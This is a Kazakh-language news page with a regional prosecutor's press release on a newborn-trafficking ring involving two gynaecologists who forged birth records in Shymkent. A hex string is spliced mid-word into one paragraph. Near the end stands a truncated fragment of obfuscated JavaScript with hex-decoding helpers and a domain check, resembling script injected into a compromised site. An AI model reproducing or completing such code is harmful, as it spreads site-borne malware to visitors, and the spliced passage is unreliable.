21-04-2022
10.3 C
Шымкент

ОҚО-да бала сату бойынша 22 іс анықталған

Облыс прокуратурасының арнайы прокурорлар басқармасымен 2015 жылдың қазан-қараша айларында және 2016 жылдың сәуір және мамыр айларында кәмелетке толмағандарды саудаға салудың 22 жайты бойынша бірнеше қылмыстық істер бойынша тергеп-тексеру аяқталған және ол істер бойынша жалпы қылмыс жасады деген 6 күдікті анықталған.

Олар 6 азаматшалардың ішіне ac2940f4f9deb15bc5bd4647dd59915eн 2-уінің қылмыстық іс бойынша тергеп-тексеру барысында процестік келісімге жасау туралы өтініші қанағаттандырылып, оларға қатысты 2 қылмыстық іс сотқа жолданған және олардың әрқайсысы 5 жылға бас бостандығынан айыруға жазаланған.

Сонымен қатар, осы қылмыстық шеңберінде Шымкент қаласының 4 тұрғынының да аталған қылмыстарға қатысы анықталған. Олардың екеуі медицина саласының қызметкері екені, осы қылмыстарды жасау кезінде тікелей өзара қылмыстық келісімге келіп, ұйымдасқан топ құрып, бірнеше рет, жаңа туылған нәрестелерді белгілі бір қаражат сомасына сатып алғандары анықталған. Олар тергеу барысында соттың санкциясымен қамауға алынған.

Яғни, аталған медицина қызметкерлері 2010-2013 жылдары аралығында, дәрігер-гинеколог саласының дәрігерлері бола тұра, кәмелетке толмағандарды саудаға салу қылмыстарын жасау үшін өзара сөз байласып, ұйымдасқан топқа өз қызмет бабын пайдалана отырып қатысушысы болып, ақпарат берумен, қылмысты жасауға кедергілерді жоюмен қылмыстың жасалуына жәрдемдесе отырып, яғни жеке пәтерлерде және нәресте босану орталығында босанып өз нәрестесінен бас тартқан аналар туралы ақпаратпен өзара алмасып, ондай аналарға «делдалдарды» кедергісіз жолықтыру, бала үшін қаражат алу қылмыстарын жасаған.

Сонымен қатар, жүкті әйелдерді басқа адамның атынан жалған құжаттарды пайдаланып тіркеу, балаларды асырап алушылардың атына, олардың бала босанбағандарын біле тұра, жалған медициналық анықтамалар жасау, босану тарихы мен жаңа туылған баланың ауру тарихын дайындап жасаған.

Бұл медицина саласының 2 қызметкерінің іс-әрекеттері облыстық прокуратурамен ҚР Қылмыстық кодексінің 133-бабы 4-бөлігі «а» тармағымен, 235 бабының 3 бөлігі, 385 бабының 2 бөлімен сараланған. (өзінің қызметтік жағдайын пайдаланып, дәрменсiз күйде екендігі кінәліге көрінеу белгiлi кәмелетке толмаған адамға қатысты, ұйымдасқан топпен, бірнеше рет саудаға салған, яғни кәмелетке толмаған адамды сатып алып-сату, бірнеше қылмысды ұйымдасқан топпен жасау, құқықтар беретін және міндеттерден босататын жалған ресми құжаттарды қолдан жасау).

Іс бойынша облыс прокурорының нұсқауымен жедел-тергеу тобы құрылған, ол топқа облыстық прокуратураның жетекшілік еткен және Шымкент қаласының Еңбекші Полиция бөлімінің қызметкерлерінен құралған. Ал жедел-іздестіру амалдары және арнайы шаралар толығымен ОҚ облыстық ІІДепартаментінің Ұйымдасқан қылмысқа қарсы күрес басқармасының қызметкерлерімен жүргізілді. Бұл тергеу амалдары мен жедел іс-шаралар Шымкент, Тараз, Алматы, Астана, Қызылорда қалаларында, сонымен қатар Оңтүстік Қазақстан облысының Созақ, Сарыағаш, Сайрам, Ордабасы аудандарында және Кентау қаласында жүргізілді.

Нәрестелердің, оларды асырап алушылар мен биологиялық аналарының үлгілері алынып, соттық молекулярлық-геномдық сараптамалар жүргізілді, жалған медициналық құжаттарға соттық қолтаңбалық және соттық-техникалық сараптамалар жүргізілді. Ал дауыс үлгілеріне сот-фоноскопиялық сараптамалар өткізілді. Бұл 100-ден астам сараптамалар ОҚ облыстық соттық сараптамалар орталығының сарапшылармен жүргізілді. Қазіргі уақытта қылмыстық істер Шымкент қаласының соттарында қарау сатысында.

          Облыс прокуратурасының баспасө қызметі

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "oknews.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Соңғы жаңалықтар

ҰҚСАС ЖАЗБАЛАР